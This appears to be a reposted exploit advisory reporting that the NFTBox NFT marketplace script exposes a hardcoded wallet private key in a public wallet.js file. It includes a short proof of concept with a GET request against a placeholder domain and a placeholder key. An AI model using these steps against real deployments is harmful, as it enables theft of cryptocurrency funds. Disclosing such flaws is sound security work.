NFTBox NFT Marketplace Solution Private Key Disclosure
# Exploit Title: NFTBox NFTBox NFT Marketplace Solution Private Key Disclosure
# Exploit Title: NFTBox - NFT Marketplace Solution - Hardcoded Private Key Disclosure
# Date: 2026-01-21
# Exploit Author: Sohel Yousef -- https://www.linkedin.com/in/sohel-yousef-50a905189/
# Vendor Homepage: https://bdtask.com/
# Software Link: https://codecanyon.net/item/nftbox-nft-marketplace-solution/35043063
# Version: Latest
# Tested on: Linux/Windows
# CVE: N/A
Description:
A critical Information Disclosure vulnerability exists in the 'NFTBox' script.
The application exposes a sensitive crypto wallet Private Key within a public JavaScript file (`wallet.js`).
This allows malicious actors to potentially access funds or interact with smart contracts unauthorizedly.
Vulnerable File:
/public/assets/website/js/wallet.js
Proof of Concept (PoC):
1. Navigate to the following path on the target application:
https://[TARGET-DOMAIN]/public/assets/website/js/wallet.js
2. Search for variable declarations related to wallet configuration (e.g., 'privateKey', 'secret').
3. The private key is visible in plain text.
Sample Request:
GET /public/assets/website/js/wallet.js HTTP/1.1
Host: [TARGET-DOMAIN]
Response (Snippet):
...
var privateKey = "0x123456..."; // SENSITIVE DATA EXPOSED
...
Impact:
Full compromise of the associated wallet, loss of funds, and unauthorized smart contract manipulation.
NFTBox NFT Marketplace Solution Private Key Disclosure
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 134
